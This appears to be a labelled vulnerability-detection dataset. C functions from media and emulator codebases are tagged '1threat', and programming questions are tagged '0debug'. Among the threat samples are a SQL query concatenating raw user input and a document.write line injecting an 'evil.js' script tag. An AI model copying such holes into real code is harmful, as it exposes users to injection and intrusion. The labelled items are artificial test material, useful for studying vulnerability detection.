case CODEC_ID_ADPCM_EA_R1:
header_size = 4 + 9 * ch;
*coded_samples = AV_RL32(buf);
break;
case CODEC_ID_ADPCM_EA_R2:
header_size = 4 + 5 * ch;
*coded_samples = AV_RL32(buf);
break;
case CODEC_ID_ADPCM_EA_R3:
header_size = 4 + 5 * ch;
*coded_samples = AV_RB32(buf);
break;
}
*coded_samples -= *coded_samples % 28;
nb_samples = (buf_size - header_size) * 2 / ch;
nb_samples -= nb_samples % 28;
break;
case CODEC_ID_ADPCM_IMA_DK3:
if (avctx->block_align > 0)
buf_size = FFMIN(buf_size, avctx->block_align);
nb_samples = ((buf_size - 16) * 8 / 3) / ch;
break;
case CODEC_ID_ADPCM_IMA_DK4:
nb_samples = 1 + (buf_size - 4 * ch) * 2 / ch;
break;
case CODEC_ID_ADPCM_IMA_WAV:
if (avctx->block_align > 0)
buf_size = FFMIN(buf_size, avctx->block_align);
nb_samples = 1 + (buf_size - 4 * ch) / (4 * ch) * 8;
break;
case CODEC_ID_ADPCM_MS:
if (avctx->block_align > 0)
buf_size = FFMIN(buf_size, avctx->block_align);
nb_samples = 2 + (buf_size - 7 * ch) * 2 / ch;
break;
case CODEC_ID_ADPCM_SBPRO_2:
case CODEC_ID_ADPCM_SBPRO_3:
case CODEC_ID_ADPCM_SBPRO_4:
{
int samples_per_byte;
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_SBPRO_2: samples_per_byte = 4; break;
case CODEC_ID_ADPCM_SBPRO_3: samples_per_byte = 3; break;
case CODEC_ID_ADPCM_SBPRO_4: samples_per_byte = 2; break;
}
if (!s->status[0].step_index) {
nb_samples++;
buf_size -= ch;
}
nb_samples += buf_size * samples_per_byte / ch;
break;
}
case CODEC_ID_ADPCM_SWF:
{
int buf_bits = buf_size * 8 - 2;
int nbits = (buf[0] >> 6) + 2;
int block_hdr_size = 22 * ch;
int block_size = block_hdr_size + nbits * ch * 4095;
int nblocks = buf_bits / block_size;
int bits_left = buf_bits - nblocks * block_size;
nb_samples = nblocks * 4096;
if (bits_left >= block_hdr_size)
nb_samples += 1 + (bits_left - block_hdr_size) / (nbits * ch);
break;
}
case CODEC_ID_ADPCM_THP:
has_coded_samples = 1;
if (buf_size < 8)
*coded_samples = AV_RB32(&buf[4]);
*coded_samples -= *coded_samples % 14;
nb_samples = (buf_size - 80) / (8 * ch) * 14;
break;
case CODEC_ID_ADPCM_XA:
nb_samples = (buf_size / 128) * 224 / ch;
break;
}
if (has_coded_samples && (*coded_samples <= 0 || *coded_samples > nb_samples))
return AVERROR_INVALIDDATA;
return nb_samples;
}
| 1threat
|
How can find the size of an image in php? : <p>I have for example an image that is 1.10Mo which has a size of 1200 * 1600 and that I want my images to be at most 100 KB what is the size of this image?</p>
| 0debug
|
static void do_commit(Monitor *mon, const QDict *qdict)
{
int all_devices;
DriveInfo *dinfo;
const char *device = qdict_get_str(qdict, "device");
all_devices = !strcmp(device, "all");
TAILQ_FOREACH(dinfo, &drives, next) {
if (!all_devices)
if (strcmp(bdrv_get_device_name(dinfo->bdrv), device))
continue;
bdrv_commit(dinfo->bdrv);
}
}
| 1threat
|
static int count_contiguous_clusters(int nb_clusters, int cluster_size,
uint64_t *l2_table, uint64_t stop_flags)
{
int i;
uint64_t mask = stop_flags | L2E_OFFSET_MASK | QCOW_OFLAG_COMPRESSED;
uint64_t first_entry = be64_to_cpu(l2_table[0]);
uint64_t offset = first_entry & mask;
if (!offset)
return 0;
assert(qcow2_get_cluster_type(first_entry) != QCOW2_CLUSTER_COMPRESSED);
for (i = 0; i < nb_clusters; i++) {
uint64_t l2_entry = be64_to_cpu(l2_table[i]) & mask;
if (offset + (uint64_t) i * cluster_size != l2_entry) {
break;
}
}
return i;
}
| 1threat
|
static av_always_inline void xchg_mb_border(H264Context *h, H264SliceContext *sl,
uint8_t *src_y,
uint8_t *src_cb, uint8_t *src_cr,
int linesize, int uvlinesize,
int xchg, int chroma444,
int simple, int pixel_shift)
{
int deblock_topleft;
int deblock_top;
int top_idx = 1;
uint8_t *top_border_m1;
uint8_t *top_border;
if (!simple && FRAME_MBAFF(h)) {
if (h->mb_y & 1) {
if (!MB_MBAFF(h))
return;
} else {
top_idx = MB_MBAFF(h) ? 0 : 1;
}
}
if (h->deblocking_filter == 2) {
deblock_topleft = h->slice_table[h->mb_xy - 1 - h->mb_stride] == sl->slice_num;
deblock_top = sl->top_type;
} else {
deblock_topleft = (h->mb_x > 0);
deblock_top = (h->mb_y > !!MB_FIELD(h));
}
src_y -= linesize + 1 + pixel_shift;
src_cb -= uvlinesize + 1 + pixel_shift;
src_cr -= uvlinesize + 1 + pixel_shift;
top_border_m1 = h->top_borders[top_idx][h->mb_x - 1];
top_border = h->top_borders[top_idx][h->mb_x];
#define XCHG(a, b, xchg) \
if (pixel_shift) { \
if (xchg) { \
AV_SWAP64(b + 0, a + 0); \
AV_SWAP64(b + 8, a + 8); \
} else { \
AV_COPY128(b, a); \
} \
} else if (xchg) \
AV_SWAP64(b, a); \
else \
AV_COPY64(b, a);
if (deblock_top) {
if (deblock_topleft) {
XCHG(top_border_m1 + (8 << pixel_shift),
src_y - (7 << pixel_shift), 1);
}
XCHG(top_border + (0 << pixel_shift), src_y + (1 << pixel_shift), xchg);
XCHG(top_border + (8 << pixel_shift), src_y + (9 << pixel_shift), 1);
if (h->mb_x + 1 < h->mb_width) {
XCHG(h->top_borders[top_idx][h->mb_x + 1],
src_y + (17 << pixel_shift), 1);
}
}
if (simple || !CONFIG_GRAY || !(h->flags & CODEC_FLAG_GRAY)) {
if (chroma444) {
if (deblock_top) {
if (deblock_topleft) {
XCHG(top_border_m1 + (24 << pixel_shift), src_cb - (7 << pixel_shift), 1);
XCHG(top_border_m1 + (40 << pixel_shift), src_cr - (7 << pixel_shift), 1);
}
XCHG(top_border + (16 << pixel_shift), src_cb + (1 << pixel_shift), xchg);
XCHG(top_border + (24 << pixel_shift), src_cb + (9 << pixel_shift), 1);
XCHG(top_border + (32 << pixel_shift), src_cr + (1 << pixel_shift), xchg);
XCHG(top_border + (40 << pixel_shift), src_cr + (9 << pixel_shift), 1);
if (h->mb_x + 1 < h->mb_width) {
XCHG(h->top_borders[top_idx][h->mb_x + 1] + (16 << pixel_shift), src_cb + (17 << pixel_shift), 1);
XCHG(h->top_borders[top_idx][h->mb_x + 1] + (32 << pixel_shift), src_cr + (17 << pixel_shift), 1);
}
}
} else {
if (deblock_top) {
if (deblock_topleft) {
XCHG(top_border_m1 + (16 << pixel_shift), src_cb - (7 << pixel_shift), 1);
XCHG(top_border_m1 + (24 << pixel_shift), src_cr - (7 << pixel_shift), 1);
}
XCHG(top_border + (16 << pixel_shift), src_cb + 1 + pixel_shift, 1);
XCHG(top_border + (24 << pixel_shift), src_cr + 1 + pixel_shift, 1);
}
}
}
}
| 1threat
|
ivshmem_server_handle_new_conn(IvshmemServer *server)
{
IvshmemServerPeer *peer, *other_peer;
struct sockaddr_un unaddr;
socklen_t unaddr_len;
int newfd;
unsigned i;
unaddr_len = sizeof(unaddr);
newfd = qemu_accept(server->sock_fd,
(struct sockaddr *)&unaddr, &unaddr_len);
if (newfd < 0) {
IVSHMEM_SERVER_DEBUG(server, "cannot accept() %s\n", strerror(errno));
return -1;
}
qemu_set_nonblock(newfd);
IVSHMEM_SERVER_DEBUG(server, "accept()=%d\n", newfd);
peer = g_malloc0(sizeof(*peer));
peer->sock_fd = newfd;
for (i = 0; i < G_MAXUINT16; i++) {
if (ivshmem_server_search_peer(server, server->cur_id) == NULL) {
break;
}
server->cur_id++;
}
if (i == G_MAXUINT16) {
IVSHMEM_SERVER_DEBUG(server, "cannot allocate new client id\n");
goto fail;
}
peer->id = server->cur_id++;
peer->vectors_count = server->n_vectors;
for (i = 0; i < peer->vectors_count; i++) {
if (event_notifier_init(&peer->vectors[i], FALSE) < 0) {
IVSHMEM_SERVER_DEBUG(server, "cannot create eventfd\n");
goto fail;
}
}
if (ivshmem_server_send_initial_info(server, peer) < 0) {
IVSHMEM_SERVER_DEBUG(server, "cannot send initial info\n");
goto fail;
}
QTAILQ_FOREACH(other_peer, &server->peer_list, next) {
for (i = 0; i < peer->vectors_count; i++) {
ivshmem_server_send_one_msg(other_peer->sock_fd, peer->id,
peer->vectors[i].wfd);
}
}
QTAILQ_FOREACH(other_peer, &server->peer_list, next) {
for (i = 0; i < peer->vectors_count; i++) {
ivshmem_server_send_one_msg(peer->sock_fd, other_peer->id,
other_peer->vectors[i].wfd);
}
}
for (i = 0; i < peer->vectors_count; i++) {
ivshmem_server_send_one_msg(peer->sock_fd, peer->id,
event_notifier_get_fd(&peer->vectors[i]));
}
QTAILQ_INSERT_TAIL(&server->peer_list, peer, next);
IVSHMEM_SERVER_DEBUG(server, "new peer id = %" PRId64 "\n",
peer->id);
return 0;
fail:
while (i--) {
event_notifier_cleanup(&peer->vectors[i]);
}
close(newfd);
g_free(peer);
return -1;
}
| 1threat
|
blkdebug_co_pwritev(BlockDriverState *bs, uint64_t offset, uint64_t bytes,
QEMUIOVector *qiov, int flags)
{
BDRVBlkdebugState *s = bs->opaque;
BlkdebugRule *rule = NULL;
assert(QEMU_IS_ALIGNED(offset, bs->bl.request_alignment));
assert(QEMU_IS_ALIGNED(bytes, bs->bl.request_alignment));
if (bs->bl.max_transfer) {
assert(bytes <= bs->bl.max_transfer);
}
QSIMPLEQ_FOREACH(rule, &s->active_rules, active_next) {
uint64_t inject_offset = rule->options.inject.offset;
if (inject_offset == -1 ||
(inject_offset >= offset && inject_offset < offset + bytes))
{
break;
}
}
if (rule && rule->options.inject.error) {
return inject_error(bs, rule);
}
return bdrv_co_pwritev(bs->file, offset, bytes, qiov, flags);
}
| 1threat
|
How can i find the sum of an array which consists of arrays and numbers : <p>How can i find the sum of an array which consists of arrays and numbers, like this [1,2,3,[4,5,6,[7,8,9],10,11,12],13,14,15]</p>
| 0debug
|
Need help creating a logo using html and css :
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-html -->
<!DOCTYPE html>
<html>
<style>
.hr{
margin-top: 0px;
margin-bottom: 0px;
width: 35%;
}
.logo{
top:0;
left:0;
position: absolute;
}
</style>
<body>
<div class="logo">
<h1>GTD</h1>
<hr>
<h3>Web Design</h3>
</div>
</body>
</html>
<!-- end snippet -->
My only problem is I can’t figure out how to center the text to the line and how do I make it where the words are directly above and below the line?
| 0debug
|
void net_rx_pkt_attach_iovec(struct NetRxPkt *pkt,
const struct iovec *iov, int iovcnt,
size_t iovoff, bool strip_vlan)
{
uint16_t tci = 0;
uint16_t ploff = iovoff;
assert(pkt);
pkt->vlan_stripped = false;
if (strip_vlan) {
pkt->vlan_stripped = eth_strip_vlan(iov, iovcnt, iovoff, pkt->ehdr_buf,
&ploff, &tci);
}
pkt->tci = tci;
net_rx_pkt_pull_data(pkt, iov, iovcnt, ploff);
}
| 1threat
|
connection.query('SELECT * FROM users WHERE username = ' + input_string)
| 1threat
|
static inline int retry_transfer_wrapper(URLContext *h, unsigned char *buf, int size, int size_min,
int (*transfer_func)(URLContext *h, unsigned char *buf, int size))
{
int ret, len;
int fast_retries = 5;
int64_t wait_since = 0;
len = 0;
while (len < size_min) {
ret = transfer_func(h, buf+len, size-len);
if (ret == AVERROR(EINTR))
continue;
if (h->flags & AVIO_FLAG_NONBLOCK)
return ret;
if (ret == AVERROR(EAGAIN)) {
ret = 0;
if (fast_retries) {
fast_retries--;
} else {
if (h->rw_timeout) {
if (!wait_since)
wait_since = av_gettime();
else if (av_gettime() > wait_since + h->rw_timeout)
return AVERROR(EIO);
}
av_usleep(1000);
}
} else if (ret < 1)
return (ret < 0 && ret != AVERROR_EOF) ? ret : len;
if (ret)
fast_retries = FFMAX(fast_retries, 2);
len += ret;
if (len < size && ff_check_interrupt(&h->interrupt_callback))
return AVERROR_EXIT;
}
return len;
}
| 1threat
|
Optimal design for database scenario : <p>I am building a system that keeps track of the visits of members to some clubs.</p>
<p>As I see it, I have 2 options to keep track of the visits, just insert one row into the visits table for each visit and when I need the total, I can just select count, when I need to display i can just do a simple select.</p>
<p>The problem, this is going to grow fast and I am sure I will have eventually like millions of rows just in this table.</p>
<p>Can mysql handle this with ease? Or better implement the second option, one row for each member, and store in one of the row cells the total amount of visits and in another cell the last 60 visits (not really more needed).</p>
<p>I guess the answer as to what's better is obvious but I am curious about how much mysql can handle because the previous system implemented 1 row for each visit.</p>
| 0debug
|
static RAMBlock *unqueue_page(RAMState *rs, ram_addr_t *offset,
ram_addr_t *ram_addr_abs)
{
RAMBlock *block = NULL;
qemu_mutex_lock(&rs->src_page_req_mutex);
if (!QSIMPLEQ_EMPTY(&rs->src_page_requests)) {
struct RAMSrcPageRequest *entry =
QSIMPLEQ_FIRST(&rs->src_page_requests);
block = entry->rb;
*offset = entry->offset;
*ram_addr_abs = (entry->offset + entry->rb->offset) &
TARGET_PAGE_MASK;
if (entry->len > TARGET_PAGE_SIZE) {
entry->len -= TARGET_PAGE_SIZE;
entry->offset += TARGET_PAGE_SIZE;
} else {
memory_region_unref(block->mr);
QSIMPLEQ_REMOVE_HEAD(&rs->src_page_requests, next_req);
g_free(entry);
}
}
qemu_mutex_unlock(&rs->src_page_req_mutex);
return block;
}
| 1threat
|
How to make a python loop that would run a c program many times? : I have a c program that I can use from the terminal but i would like to run it many times in a loop in python. Someone told me to use the subprocess.call function but I have some trouble understanding how that works.
From the terminal I usually run exactly this ```./grezza_foresta -w /Users/stordd/Desktop/StageI2M/Leiden/text_file/USA.g" -m 5 -e 0 > file_name.g ``` (the -w -m -e are option and the > is to create a file with the output)
So I tried something like that from what I've been told to do .
```
import subprocess
subprocess.call(["g++", "/Users/stordd/Desktop/StageI2M/C/forestenostre/grezza_foresta"])
ntrial = input("How many trials? ")
for i in range(int(ntrial)):
tmp=subprocess.call("/Users/stordd/Desktop/StageI2M/C/forestenostre/grezza_foresta")
print(i,tmp)
```
I'm getting these error : ```ld: warning: ignoring file /Users/stordd/Desktop/StageI2M/Leiden/text_file/USA.g, file was built for unsupported file format ( 0x6E 0x75 0x6D 0x65 0x72 0x6F 0x5F 0x64 0x69 0x5F 0x76 0x65 0x72 0x74 0x69 0x63 ) which is not the architecture being linked (x86_64): /Users/stordd/Desktop/StageI2M/Leiden/text_file/USA.g
How many trials? ld: can't link with a main executable file '/Users/stordd/Desktop/StageI2M/C/forestenostre/grezza_foresta' for architecture x86_64
clang: error: linker command failed with exit code 1 (use -v to see invocation)```
It actually seems to be working in some way but I don't know how to add the options.
| 0debug
|
static int write_manifest(AVFormatContext *s, int final)
{
DASHContext *c = s->priv_data;
AVIOContext *out;
char temp_filename[1024];
int ret, i;
AVDictionaryEntry *title = av_dict_get(s->metadata, "title", NULL, 0);
snprintf(temp_filename, sizeof(temp_filename), "%s.tmp", s->filename);
ret = avio_open2(&out, temp_filename, AVIO_FLAG_WRITE, &s->interrupt_callback, NULL);
if (ret < 0) {
av_log(s, AV_LOG_ERROR, "Unable to open %s for writing\n", temp_filename);
return ret;
}
avio_printf(out, "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n");
avio_printf(out, "<MPD xmlns:xsi=\"http:
"\txmlns=\"urn:mpeg:dash:schema:mpd:2011\"\n"
"\txmlns:xlink=\"http:
"\txsi:schemaLocation=\"urn:mpeg:DASH:schema:MPD:2011 http:
"\tprofiles=\"urn:mpeg:dash:profile:isoff-live:2011\"\n"
"\ttype=\"%s\"\n", final ? "static" : "dynamic");
if (final) {
avio_printf(out, "\tmediaPresentationDuration=\"");
write_time(out, c->total_duration);
avio_printf(out, "\"\n");
} else {
int update_period = c->last_duration / AV_TIME_BASE;
if (c->use_template && !c->use_timeline)
update_period = 500;
avio_printf(out, "\tminimumUpdatePeriod=\"PT%dS\"\n", update_period);
avio_printf(out, "\tsuggestedPresentationDelay=\"PT%dS\"\n", c->last_duration / AV_TIME_BASE);
if (!c->availability_start_time[0] && s->nb_streams > 0 && c->streams[0].nb_segments > 0) {
time_t t = time(NULL);
struct tm *ptm, tmbuf;
ptm = gmtime_r(&t, &tmbuf);
if (ptm) {
if (!strftime(c->availability_start_time, sizeof(c->availability_start_time),
"%Y-%m-%dT%H:%M:%S", ptm))
c->availability_start_time[0] = '\0';
}
}
if (c->availability_start_time[0])
avio_printf(out, "\tavailabilityStartTime=\"%s\"\n", c->availability_start_time);
if (c->window_size && c->use_template) {
avio_printf(out, "\ttimeShiftBufferDepth=\"");
write_time(out, c->last_duration * c->window_size);
avio_printf(out, "\"\n");
}
}
avio_printf(out, "\tminBufferTime=\"");
write_time(out, c->last_duration);
avio_printf(out, "\">\n");
avio_printf(out, "\t<ProgramInformation>\n");
if (title) {
char *escaped = xmlescape(title->value);
avio_printf(out, "\t\t<Title>%s</Title>\n", escaped);
av_free(escaped);
}
avio_printf(out, "\t</ProgramInformation>\n");
if (c->window_size && s->nb_streams > 0 && c->streams[0].nb_segments > 0 && !c->use_template) {
OutputStream *os = &c->streams[0];
int start_index = FFMAX(os->nb_segments - c->window_size, 0);
int64_t start_time = av_rescale_q(os->segments[start_index]->time, s->streams[0]->time_base, AV_TIME_BASE_Q);
avio_printf(out, "\t<Period start=\"");
write_time(out, start_time);
avio_printf(out, "\">\n");
} else {
avio_printf(out, "\t<Period start=\"PT0.0S\">\n");
}
if (c->has_video) {
avio_printf(out, "\t\t<AdaptationSet id=\"video\" segmentAlignment=\"true\" bitstreamSwitching=\"true\">\n");
for (i = 0; i < s->nb_streams; i++) {
AVStream *st = s->streams[i];
OutputStream *os = &c->streams[i];
if (s->streams[i]->codec->codec_type != AVMEDIA_TYPE_VIDEO)
continue;
avio_printf(out, "\t\t\t<Representation id=\"%d\" mimeType=\"video/mp4\" codecs=\"%s\"%s width=\"%d\" height=\"%d\">\n", i, os->codec_str, os->bandwidth_str, st->codec->width, st->codec->height);
output_segment_list(&c->streams[i], out, c);
avio_printf(out, "\t\t\t</Representation>\n");
}
avio_printf(out, "\t\t</AdaptationSet>\n");
}
if (c->has_audio) {
avio_printf(out, "\t\t<AdaptationSet id=\"audio\" segmentAlignment=\"true\" bitstreamSwitching=\"true\">\n");
for (i = 0; i < s->nb_streams; i++) {
AVStream *st = s->streams[i];
OutputStream *os = &c->streams[i];
if (s->streams[i]->codec->codec_type != AVMEDIA_TYPE_AUDIO)
continue;
avio_printf(out, "\t\t\t<Representation id=\"%d\" mimeType=\"audio/mp4\" codecs=\"%s\"%s audioSamplingRate=\"%d\">\n", i, os->codec_str, os->bandwidth_str, st->codec->sample_rate);
avio_printf(out, "\t\t\t\t<AudioChannelConfiguration schemeIdUri=\"urn:mpeg:dash:23003:3:audio_channel_configuration:2011\" value=\"%d\" />\n", st->codec->channels);
output_segment_list(&c->streams[i], out, c);
avio_printf(out, "\t\t\t</Representation>\n");
}
avio_printf(out, "\t\t</AdaptationSet>\n");
}
avio_printf(out, "\t</Period>\n");
avio_printf(out, "</MPD>\n");
avio_flush(out);
avio_close(out);
return ff_rename(temp_filename, s->filename, s);
}
| 1threat
|
Error : java.util.ArrayList cannot be cast to java.lang.String : <p>when am running my action i faced Error :
" java.util.ArrayList cannot be cast to java.lang.String "</p>
<p>and this is my code :</p>
<pre><code> textField_1 = new JTextField();
textField_1.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent e) {
Object selected = list_1.getSelectedValue();
Connection conn = null;
PreparedStatement stmt = null;
String a =null;
try{
conn=DriverManager.getConnection("jdbc:mysql://localhost/flyer","root","000");
String query= " INSERT INTO flyer_item (discount) SELECT price * ? FROM `item` WHERE item_name = `?` ";
Statement st= conn.createStatement();
java.sql.PreparedStatement ps = conn.prepareStatement(query);
ps.setString(1,a);
ps.setString(2,(String) selected);
ps.executeUpdate();
st.executeUpdate(query);
} catch (SQLException se){
System.out.println(se.getMessage());
} }} );
</code></pre>
<p>Any help please ?</p>
| 0debug
|
C# EWS Managed API: How to access shared mailboxes but not my own inbox : <p>How can I connect to an exchange server and read mail from a shared mailbox (one that is not my own "myname@mycompany.com").</p>
<p>Here is my code thus far:</p>
<pre><code>//Create a service
ExchangeService service = new ExchangeService(ExchangeVersion.Exchange2007_SP1);
//Autodiscover end point
service.AutodiscoverUrl("someaddress@mycompany.com");
FindFoldersResults folderSearchResults = service.FindFolders(WellKnownFolderName.Inbox, new FolderView(int.MaxValue));
Microsoft.Exchange.WebServices.Data.Folder exchangeMailbox = folderSearchResults.Folders.ToList().Find(
f => f.DisplayName.Equals("NameOfSharedMailboxIwant", StringComparison.CurrentCultureIgnoreCase));
//Set the number of items we can deal with at anyone time.
ItemView itemView = new ItemView(int.MaxValue);
foreach (Microsoft.Exchange.WebServices.Data.Folder folderFromSearchResults in folderSearchResults.Folders)
{
if (folderFromSearchResults.DisplayName.Equals("NameOfSharedMailboxIWant", StringComparison.OrdinalIgnoreCase))
{
Microsoft.Exchange.WebServices.Data.Folder boundFolder =
Microsoft.Exchange.WebServices.Data.Folder.Bind(service, folderFromSearchResults.Id);
SearchFilter unreadSearchFilter =
new SearchFilter.SearchFilterCollection(
LogicalOperator.And, new SearchFilter.IsEqualTo(
EmailMessageSchema.IsRead, false));
//Find the unread messages in the email folder.
FindItemsResults<Item> unreadMessages = boundFolder.FindItems(unreadSearchFilter, itemView);
foreach (EmailMessage message in unreadMessages)
{
message.Load();
Console.WriteLine(message.Subject);
}
}
</code></pre>
<p>When I run this, I get an exception thrown that says that that "The SMTP address has no mailbox associated with it " during:</p>
<pre><code> Microsoft.Exchange.WebServices.Data.Folder exchangeMailbox = folderSearchResults.Folders.ToList().Find(
f => f.DisplayName.Equals("BA", StringComparison.CurrentCultureIgnoreCase));
</code></pre>
<p>What am I missing? I feel like I am almost there and that this should work according to the EWS Managed API 2.0 documentation, but I</p>
| 0debug
|
static void qemu_rbd_complete_aio(RADOSCB *rcb)
{
RBDAIOCB *acb = rcb->acb;
int64_t r;
r = rcb->ret;
if (acb->cmd == RBD_AIO_WRITE ||
acb->cmd == RBD_AIO_DISCARD) {
if (r < 0) {
acb->ret = r;
acb->error = 1;
} else if (!acb->error) {
acb->ret = rcb->size;
}
} else {
if (r < 0) {
memset(rcb->buf, 0, rcb->size);
acb->ret = r;
acb->error = 1;
} else if (r < rcb->size) {
memset(rcb->buf + r, 0, rcb->size - r);
if (!acb->error) {
acb->ret = rcb->size;
}
} else if (!acb->error) {
acb->ret = r;
}
}
acb->bh = qemu_bh_new(rbd_aio_bh_cb, acb);
qemu_bh_schedule(acb->bh);
g_free(rcb);
}
| 1threat
|
Cant find package manager console in visual studio for mac : <p>I am using Visual studio for mac. I need to install some packages but I can't find package manager console for that.</p>
<p>Visual studio version: Preview 1 (7.0 build 347)</p>
| 0debug
|
static void qemu_chr_parse_udp(QemuOpts *opts, ChardevBackend *backend,
Error **errp)
{
const char *host = qemu_opt_get(opts, "host");
const char *port = qemu_opt_get(opts, "port");
const char *localaddr = qemu_opt_get(opts, "localaddr");
const char *localport = qemu_opt_get(opts, "localport");
bool has_local = false;
SocketAddress *addr;
if (host == NULL || strlen(host) == 0) {
host = "localhost";
}
if (port == NULL || strlen(port) == 0) {
error_setg(errp, "chardev: udp: remote port not specified");
return;
}
if (localport == NULL || strlen(localport) == 0) {
localport = "0";
} else {
has_local = true;
}
if (localaddr == NULL || strlen(localaddr) == 0) {
localaddr = "";
} else {
has_local = true;
}
backend->udp = g_new0(ChardevUdp, 1);
addr = g_new0(SocketAddress, 1);
addr->kind = SOCKET_ADDRESS_KIND_INET;
addr->inet = g_new0(InetSocketAddress, 1);
addr->inet->host = g_strdup(host);
addr->inet->port = g_strdup(port);
addr->inet->has_ipv4 = qemu_opt_get(opts, "ipv4");
addr->inet->ipv4 = qemu_opt_get_bool(opts, "ipv4", 0);
addr->inet->has_ipv6 = qemu_opt_get(opts, "ipv6");
addr->inet->ipv6 = qemu_opt_get_bool(opts, "ipv6", 0);
backend->udp->remote = addr;
if (has_local) {
backend->udp->has_local = true;
addr = g_new0(SocketAddress, 1);
addr->kind = SOCKET_ADDRESS_KIND_INET;
addr->inet = g_new0(InetSocketAddress, 1);
addr->inet->host = g_strdup(localaddr);
addr->inet->port = g_strdup(localport);
backend->udp->local = addr;
}
}
| 1threat
|
Copy highlighted element from <select> using javascript : How do I copy highlighted/selected element from one <select> to another <select> on click of a button using javascript not jquery??
| 0debug
|
static int decode_residuals(FLACContext *s, int channel, int pred_order)
{
int i, tmp, partition, method_type, rice_order;
int sample = 0, samples;
method_type = get_bits(&s->gb, 2);
if (method_type > 1) {
av_log(s->avctx, AV_LOG_ERROR, "illegal residual coding method %d\n",
method_type);
return -1;
}
rice_order = get_bits(&s->gb, 4);
samples= s->blocksize >> rice_order;
if (pred_order > samples) {
av_log(s->avctx, AV_LOG_ERROR, "invalid predictor order: %i > %i\n",
pred_order, samples);
return -1;
}
sample=
i= pred_order;
for (partition = 0; partition < (1 << rice_order); partition++) {
tmp = get_bits(&s->gb, method_type == 0 ? 4 : 5);
if (tmp == (method_type == 0 ? 15 : 31)) {
tmp = get_bits(&s->gb, 5);
for (; i < samples; i++, sample++)
s->decoded[channel][sample] = get_sbits_long(&s->gb, tmp);
} else {
for (; i < samples; i++, sample++) {
s->decoded[channel][sample] = get_sr_golomb_flac(&s->gb, tmp, INT_MAX, 0);
}
}
i= 0;
}
return 0;
}
| 1threat
|
go lang define custom time format : I am trying to write a custom date format string as required by my application.
Using golang time module I get the format using a clumsy function (below)
Also since this function will be called millions of times every day , I want this to be super efficient too. Is there a POSIX style formatting available in golang
package main
import (
"fmt"
"time"
)
func main() {
t := time.Now()
fmt.Printf("Time now is %d%02d%02d%02d%02d%02d",
t.Year(), t.Month(), t.Day(), t.Hour(), t.Minute(), t.Second())
}
| 0debug
|
SSMS Snippets and Shortcuts : <p>I'm using SSMS 2014. I am able to insert a snippet but they don't seem to respond to shortcuts (ie crproc[tab])</p>
<p>Is this feature known to work?</p>
<pre><code><?xml version="1.0" encoding="utf-8" ?>
<CodeSnippets xmlns="http://schemas.microsoft.com/VisualStudio/2005/CodeSnippet">
<CodeSnippet Format="1.0.0">
<Header>
<Title>prod1</Title>
<Description>testing</Description>
<Author> dale </Author>
<SnippetTypes>
<SnippetType>Expansion</SnippetType>
</SnippetTypes>
<Shortcut>crproc</Shortcut>
</Header>
<Snippet>
<Declarations>
<Literal>
<ID>DatabaseName</ID>
<ToolTip>Name of database.</ToolTip>
<Default>DB</Default>
</Literal>
</Declarations>
<Code Language="SQL">
<![CDATA[
------------------------------------------------------
-- FILENAME: Template-Expansion.snippet
-- PURPOSE: Template for Expansion (Insert) snippets.
-- AUTHOR: Ken O. Bonn
-- DATE: May 15, 2013
------------------------------------------------------
SET NOCOUNT ON;
EXEC SP_HELPDB $DatabaseName$;
]]>
</Code>
</Snippet>
</CodeSnippet>
</CodeSnippets>
</code></pre>
| 0debug
|
Installation of Minishlink/web-push : i am unable to install this library from github. [ Minishlink/web-push ]<br><br>
I have Lravel 5 installed on my server, I want to install this in the larvel directory (project). And will use the library via custom PHP.<br><br>
I am facing below issues,
1. when i run `composer require minishlink/web-push`, i get below eror[![enter image description here][1]][1]
2. when i run `composer require mdanter/eec`, i get below error[![enter image description here][2]][2]
3. when i run `composer require pargonie/rndom_compat`, i get below error[![enter image description here][3]][3]
[1]: http://i.stack.imgur.com/5ClD3.jpg
[2]: http://i.stack.imgur.com/YukqG.jpg
[3]: http://i.stack.imgur.com/nWvRq.jpg
| 0debug
|
iOS 11 search bar jumping to top of screen : <p>I've got a UITableView in which I set its header to be a search bar.</p>
<pre><code>tableView.tableHeaderView = searchController.searchBar
</code></pre>
<p>Everything works according to plan until you click it and it seemingly detaches from the tableView and jumps to the top of the screen. The tableView rows stay in place. Any reason it would do that in iOS 11 and not iOS 10?</p>
| 0debug
|
How to open 2 Visual Studio instances, with same Git projects and different branches : <p>I am needing to open 2 Visual Studio instances, one will be opened for me to just look the code of the Project X /Branch 1.
Another, will be used to code in the Project X / Branch 2.
How to do that and don't loose changes in commit operation? </p>
| 0debug
|
How to get valiues from JSON response? : this is my json response. I want to show values from 3rd index in a listview from every array...
"history":[["2","mega@gmail.com","21.2299924","72.8247365","1479718230719"],["3","mega@gmail.com","21.2299926","72.8247346","1479718265453"],["4","mega@gmail.com","21.2299924","72.8247345","1479719800472"],["5","mega@gmail.com","21.2299927","72.8247354","1479720302919"],["6","mega@gmail.com","21.2299926","72.8247344","1479720880373"],["7","mega@gmail.com","21.2299926","72.8247343","1479721139992"]]}
| 0debug
|
How to create a google map image mask overlay? : <p>I'm trying to create a google map "inside" an shape like in the example bellow.
Could you please help me?
<a href="https://i.stack.imgur.com/qsGHC.png" rel="nofollow noreferrer">Click to see Image</a></p>
| 0debug
|
document.write('<script src="evil.js"></script>');
| 1threat
|
Rails Global Function: Pass Object Function Is Called On : <p>I want to create a global function, which I will put in my application controller.</p>
<p>For the sake of making this question simple, here is an example of what I would do:</p>
<p>In my <code>/application_controller.rb</code></p>
<pre><code>def self.global_function(device)
p device
end
</code></pre>
<p>And in the controller I'm working in:</p>
<pre><code>def some_function
global_function(Device.find(some_id))
end
</code></pre>
<p>That works, but I would like to have it work, for example, as the <code>.last</code> method does. The end result would allow me to call like this instead:</p>
<pre><code>def some_function
Device.find(some_id).global_function
end
</code></pre>
<p>Still passing the device object over, but without the need for parameters.</p>
<p>I can't give a reason for why I prefer one over the other, aside from aesthetics. If there are any drawbacks from using one way over the other, I'd like to know that as well. Thanks</p>
| 0debug
|
IndentationError: expected an indented block when trying to reproduce LDA for a document : <p>I am trying to obtain the LDA distribution among the first article of my collection but I am running into several errors:</p>
<p>my collection: <code>doc_set</code>, is a <code>pandas.core.series.Series</code>. Whenever I wanted to run the simple code:</p>
<pre><code>print(ldamodel[doc_set[1]])
</code></pre>
